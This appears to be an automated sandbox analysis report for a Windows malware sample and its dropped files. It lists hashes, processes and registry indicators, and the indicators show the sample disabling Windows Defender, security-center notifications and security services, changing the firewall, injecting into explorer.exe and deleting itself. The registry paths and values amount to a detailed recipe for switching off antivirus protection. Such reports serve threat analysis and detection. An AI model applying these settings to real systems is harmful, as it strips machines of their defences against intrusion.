Overview
overview
10Static
static
7c22b74bb5b...0b.exe
windows7-x64
10c22b74bb5b...0b.exe
windows10-2004-x64
10$PLUGINSDI...el.dll
windows7-x64
7$PLUGINSDI...el.dll
windows10-2004-x64
7$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$_13_/PowerRun64.exe
windows7-x64
4$_13_/PowerRun64.exe
windows10-2004-x64
3$_13_/SetACL64.exe
windows7-x64
1$_13_/SetACL64.exe
windows10-2004-x64
1$_13_/bn.bat
windows7-x64
1$_13_/bn.bat
windows10-2004-x64
1$_13_/bn1.bat
windows7-x64
10$_13_/bn1.bat
windows10-2004-x64
10$_13_/bnn.bat
windows7-x64
1$_13_/bnn.bat
windows10-2004-x64
1$_13_/bnz.bat
windows7-x64
1$_13_/bnz.bat
windows10-2004-x64
1$_13_/dotN...up.exe
windows7-x64
7$_13_/dotN...up.exe
windows10-2004-x64
7$_13_/dotN...up.exe
windows7-x64
7$_13_/dotN...up.exe
windows10-2004-x64
7$_13_/mbby...iy.exe
windows7-x64
3$_13_/mbby...iy.exe
windows10-2004-x64
3$_13_/win_...rp.exe
windows7-x64
3$_13_/win_...rp.exe
windows10-2004-x64
3Analysis
-
max time kernel
93s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2024 16:08
Behavioral task
behavioral1
Sample
c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
$_13_/PowerRun64.exe
Resource
win7-20241010-en
Behavioral task
behavioral8
Sample
$_13_/PowerRun64.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
$_13_/SetACL64.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
$_13_/SetACL64.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
$_13_/bn.bat
Resource
win7-20241010-en
Behavioral task
behavioral12
Sample
$_13_/bn.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
$_13_/bn1.bat
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
$_13_/bn1.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
$_13_/bnn.bat
Resource
win7-20240708-en
Behavioral task
behavioral16
Sample
$_13_/bnn.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
$_13_/bnz.bat
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
$_13_/bnz.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
$_13_/dotNetFx40_Full_setup.exe
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
$_13_/dotNetFx40_Full_setup.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
$_13_/dotNetFx45_Full_setup.exe
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
$_13_/dotNetFx45_Full_setup.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
$_13_/mbbyfatkrvotaiy.exe
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
$_13_/mbbyfatkrvotaiy.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
$_13_/win_version_csharp.exe
Resource
win7-20241010-en
Behavioral task
behavioral26
Sample
$_13_/win_version_csharp.exe
Resource
win10v2004-20241007-en
General
-
Target
c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe
-
Size
2.5MB
-
MD5
e44aa4739e6414c5dec3ede80232deab
-
SHA1
a2a38256e63e2acd791f46a82cc74e34e26d4d79
-
SHA256
c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b
-
SHA512
1f10f95db7d67856bbebf9aa4510cb6122e3a7624ef7e3f0cd2d49b08a13b07e8ba43cbe771e4db0d7171f605dca78027cf56369ec90963f1577f3a75ea2f692
-
SSDEEP
49152:P3g6ex2uF+sfC0sJfPT2Xs2WyexyCfXHHVz6UWimMVUiPCqsnaVnHB4lmtpQ3l5f:P7o2wfqNSoyc0G7r6XnaVn/tW5f
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe -
Modifies security service 2 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" reg.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 408 netsh.exe 5040 netsh.exe -
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral2/memory/4680-1101-0x0000000074740000-0x0000000074749000-memory.dmp acprotect -
Deletes itself 1 IoCs
pid Process 3232 explorer.exe -
Executes dropped EXE 62 IoCs
pid Process 4484 dotNetFx40_Full_setup.exe 116 Setup.exe 3624 dotNetFx45_Full_setup.exe 4004 Setup.exe 2312 SetACL64.exe 904 SetACL64.exe 5056 SetACL64.exe 5020 SetACL64.exe 3052 SetACL64.exe 4980 SetACL64.exe 4116 SetACL64.exe 2568 SetACL64.exe 1324 PowerRun64.exe 3528 PowerRun64.exe 4400 PowerRun64.exe 2824 PowerRun64.exe 4144 PowerRun64.exe 3588 PowerRun64.exe 2656 PowerRun64.exe 2592 PowerRun64.exe 5080 PowerRun64.exe 3428 PowerRun64.exe 5028 PowerRun64.exe 2368 PowerRun64.exe 1940 PowerRun64.exe 3340 PowerRun64.exe 4368 PowerRun64.exe 2284 PowerRun64.exe 1028 PowerRun64.exe 3096 PowerRun64.exe 464 PowerRun64.exe 1616 PowerRun64.exe 2572 PowerRun64.exe 4312 PowerRun64.exe 3724 PowerRun64.exe 60 PowerRun64.exe 4124 PowerRun64.exe 1268 PowerRun64.exe 4104 PowerRun64.exe 3560 PowerRun64.exe 3136 PowerRun64.exe 3048 PowerRun64.exe 3920 PowerRun64.exe 5084 PowerRun64.exe 3428 PowerRun64.exe 3084 PowerRun64.exe 2728 PowerRun64.exe 2116 PowerRun64.exe 1528 PowerRun64.exe 4776 PowerRun64.exe 1292 PowerRun64.exe 2680 PowerRun64.exe 4100 PowerRun64.exe 2000 PowerRun64.exe 1616 PowerRun64.exe 2440 PowerRun64.exe 2156 PowerRun64.exe 2620 PowerRun64.exe 3436 PowerRun64.exe 828 PowerRun64.exe 464 mbbyfatkrvotaiy.exe 3824 win_version_csharp.exe -
Loads dropped DLL 12 IoCs
pid Process 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 116 Setup.exe 116 Setup.exe 4004 Setup.exe 4004 Setup.exe 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features SetACL64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features SetACL64.exe -
Modifies Security services 2 TTPs 10 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4680 set thread context of 3232 4680 c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe 282 -
resource yara_rule behavioral2/memory/4680-1101-0x0000000074740000-0x0000000074749000-memory.dmp upx -
pid Process 3900 powershell.exe 3944 powershell.exe 3420 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dotNetFx45_Full_setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mbbyfatkrvotaiy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" 